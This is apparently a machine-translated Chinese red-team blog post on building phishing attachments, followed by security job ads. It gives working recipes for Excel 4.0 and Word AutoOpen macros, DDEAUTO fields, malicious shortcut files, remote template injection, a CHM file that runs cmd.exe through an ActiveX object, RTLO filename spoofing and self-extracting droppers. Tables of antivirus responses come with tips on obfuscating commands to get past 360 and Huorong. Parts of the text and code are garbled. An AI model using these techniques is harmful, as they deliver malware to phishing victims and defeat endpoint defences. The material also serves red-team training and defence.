你们可能都听说过网络钓鱼电子邮件,我们常常认为自己足够聪明,不会上当受骗。 但请不要低估网络钓鱼电子邮件的伪装。 全球每年因钓鱼邮件造成的经济损失达数百亿美元。 钓鱼邮件会伪装成任何看似普通的电子邮件,欺骗收件人泄露帐号、密码或密码等信息,甚至将超链接中的网页做得非常逼真。 当你相信它是真的时,你在网页上留下的重要信息就是别人的了。
下面介绍一下红队最常用的钓鱼方法:
链接网络钓鱼
电子邮件带有超链接或 URL。 这种类型的网络钓鱼电子邮件实际上很常见。 诈骗者将网络钓鱼链接直接嵌入到电子邮件中。 点击该链接是骗子制作的假冒钓鱼网站。 此类网站通常要求用户输入帐户信息。 获取用户敏感信息的类。
附件钓鱼
电子邮件带有各种附件。 很多人看到电子邮件中的附件时,都会习惯性地点击查看。 钓鱼邮件的附件包括exe/scr后缀的附件,此类附件风险最高,一般都是病毒执行程序。 其他常见的还有Html网页附件、Doc附件、Excel附件、PDF附件等。
接下来我们将介绍附件钓鱼中的各种文件制作技术,以及杀毒软件的查杀情况。 (部分技巧和图片是从网上资料收集整理的,根据自己的经验写下这篇综合总结。)
XLM/Macro 4.0(excel 宏观钓鱼)
创建一个新工作表并选择插入 MS .0 宏工作表
输入命令设置第一行
=EXEC("c:\\cmd.exe")
=暂停()
保存后,打开文件并运行程序。
可以通过宏使用命令上网cs
在线cs,混淆命令执行
杀软件
火种
360全家桶
混淆命令
无提示
行为杀人
宏文件提示
Word宏钓鱼
新建一个word文件并设置宏
输入(打开文件时自动执行宏),宏的位置必须指定为当前文档
:启动Word或加载全局模板时
:每次创建新文档时
:每次打开现有文档时
:每次关闭文档时
:退出Word或卸载全局模板时
Sub AutoOpen()
Shell ("calc") //只需要写这个就行了
End Sub
另存为 docm(启用宏的 Word 文档)
一般情况下,打开文件需要手动打开宏
杀软件
火种
360全家桶
防杀木马
无提示
无提示
无提示
字DDE
一种在Word中执行任意代码的方法,可以在不启用宏的情况下执行任意程序。
该功能的初衷是为了更方便地更新Word中其他应用程序的内容。 比如一个word文档引用了另一个excel表格中的一项,在excel中可以通过连接字段来实现。 在word中更新内容后,在word中同步更新效果的问题是,该字段的内容可以是公式(或表达式),而这个公式对内容没有限制。
实用性比宏更实用。 当执行DDE时,用户点击两个按钮来执行。
新建一个Word文档,CTRL+F9,复制文档中出现“{}”后大括号之间的代码,并保存文件:
{ DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" }
杀软件
火种
360全家桶
防杀木马
无提示
无提示
无提示
链接+链接
创建链接文件以诱导用户单击。 Word 和 Excel 都可以使用。
创建快捷方式
目标位置填充命令操作
command calc SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -
在Word或Excel中插入一个对象,选中它,单击“显示为图标”以增加诱惑,将图标更改为word或excel等更容易混淆的图标。
修改对应的标题名称等,插入链接。 用户可以点击运行程序操作。
在线cs,混淆命令执行
杀软件
火种
360全家桶
混淆命令
无提示
行为检查和查杀,不能带-w
无提示
模板文件注入宏
使用模板创建文档,然后创建启用宏的模板文件。 然后用模板修改文档压缩包中的内容,使其指向的模板修改为我们自己创建的模板文件。 该过程可以通过smb协议来完成,因此被检测到的概率较高。
在启用宏的模板文件 (doc3.dotm) 中写入宏。
Sub AutoOpen()
Shell "calc" //此处填写命令
End Sub
在启用模板的文档doc3.docx压缩包中找到\.xml.rels修改,将文件协议指向模板文件。
打开文档执行命令
该协议可以使用smb和http,大大增加了钓鱼场景的数量。
在线cs,混淆命令执行,
杀软件
火种
360全家桶
混淆命令
无提示
宏病毒行为查杀,不带-w
宏病毒
CHM电子书
新建一个html文件,编码格式ANSI,写入代码
<html><head><title>Mousejack replaytitle><head>head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe,/c calc.exe'>
//这一排用于执行命令,注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行
<PARAM name="Item2" value="273,1,1">
OBJECT>
<SCRIPT>
x.Click();
SCRIPT>
body>html>
使用软件,新建-浏览-选择html文件所在目录-选择html文件-编译
与宏文档相比,chm电子书的使用受到更多限制。 附件携带chm电子书需要配套装备、xx手册等钓鱼技巧。
在线cs,混淆命令执行
杀软件
火种
360全家桶
混淆命令
无提示
黑窗无提示
无提示
RTLO 字符
制作木马文件,倒序输入后缀
提示:[文件名][假后缀倒序].exe
要重命名,请在 a 之后右键单击并插入控制字符 -> RLO
钓鱼时可以命名为:XXX公司xxxx证件号
增加混乱
使用反病毒加载器生成木马测试
杀软件
火种
360全家桶
混淆命令
无提示
无提示
无提示
rar解压并自运行
木马文件:.exe 混淆文件:calc.exe 或文档
回车,选择这两个文件,右键添加到压缩包中,创建自解压格式压缩文件
高级->自解压选项->设置
模式->隐藏全部
更新->提取并更新文件,覆盖所有文件
运行后上线
杀软件
火种
360全家桶
防杀木马
检查并杀死
检查并杀死
检查并杀死
招聘启事
安恒雷神公测SRC操作(实习生)
—————————
【职责】
1、负责SRC微博、微信公众号等网络新媒体的运营,维护用户活跃度,增加网站访问量;
2、负责白帽提交的漏洞审核、Rank评级、漏洞修复等相关沟通工作,促进审核者与白帽之间的友好协作与沟通;
3、参与白帽子线下活动的策划、组织和实施,如沙龙、新闻发布会、技术交流论坛等;
4、积极参与雷神检测品牌推广,协助技术人员输出优质技术文章;
5、积极参与与公司媒体、相关行业媒体及其他市场资源的工作沟通。
【工作要求】
1、责任心强,性格活泼,具有良好的人际交往能力;
2、对网络安全感兴趣并对该行业有基本了解;
3、良好的文案写作能力和活动组织协调能力。
提交简历至
设计师(实习生)
—————————
【职位描述】
负责设计公司日常宣传图片、软文等设计相关工作,并负责产品品牌设计。
【工作要求】
1、从事平面设计相关工作1年以上,熟悉印刷技术; 具有敏锐的观察力和审美能力,以及优秀的创意设计能力; 具有VI设计、广告设计、画册设计等专业知识;
2、具有良好的美术功底、审美能力和创造力,色彩感强;
3、熟练使用///等设计、制作软件;
4、有品牌传播、产品设计或新媒体视觉工作经验;
【职位其他信息】
公司名称:杭州安恒信息技术有限公司
办公地点:杭州市滨江区安恒大厦19楼
学历要求:本科及以上学历
工作经验:1年及以上,条件优秀者可适当放宽
提交简历至
安全招聘
—————————
公司:安恒信息
职位:Web安全安全研究员
部门:战略支持部
薪资:13-3万
工作经验:1年以上
工作地点:杭州(总部)、广州、成都、上海、北京
工作环境:大楼、健身中心、医生、帅哥、美女、高档食堂……
【工作职责】
1、定期与部门及全公司进行技术分享;
2、研究前沿攻防技术,跟踪国内外安全领域的安全趋势,披露漏洞并落地;
3、负责完成部门渗透测试和红蓝对抗业务;
4、负责自动化平台建设
5. 负责测试WAF通用产品规则并实施解决方案
【工作要求】
1、1年以上安全领域工作经验;